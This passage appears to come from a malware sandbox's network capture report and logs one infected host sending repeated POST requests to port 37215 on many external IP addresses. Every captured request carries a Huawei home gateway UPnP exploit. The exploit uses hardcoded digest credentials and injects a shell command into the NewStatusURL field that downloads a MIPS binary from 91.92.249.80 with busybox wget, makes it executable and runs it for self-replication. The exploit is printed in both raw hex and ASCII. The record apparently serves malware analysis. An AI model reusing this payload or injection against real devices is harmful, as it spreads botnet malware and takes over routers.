                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1591192.168.2.2342642157.11.221.7737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497448921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1592192.168.2.233562413.48.154.5037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497519970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1593192.168.2.234128641.148.193.1337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497530937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1594192.168.2.236074641.10.168.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497551918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1595192.168.2.234749241.93.100.25237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497565985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1596192.168.2.234842441.216.119.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497565985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1597192.168.2.2356446197.180.237.11637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497627974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1598192.168.2.234718893.107.21.21137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497658968 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1599192.168.2.2357790197.20.236.6137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497659922 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1600192.168.2.2350784174.127.33.9537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497720957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1601192.168.2.234247241.219.144.13837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497767925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
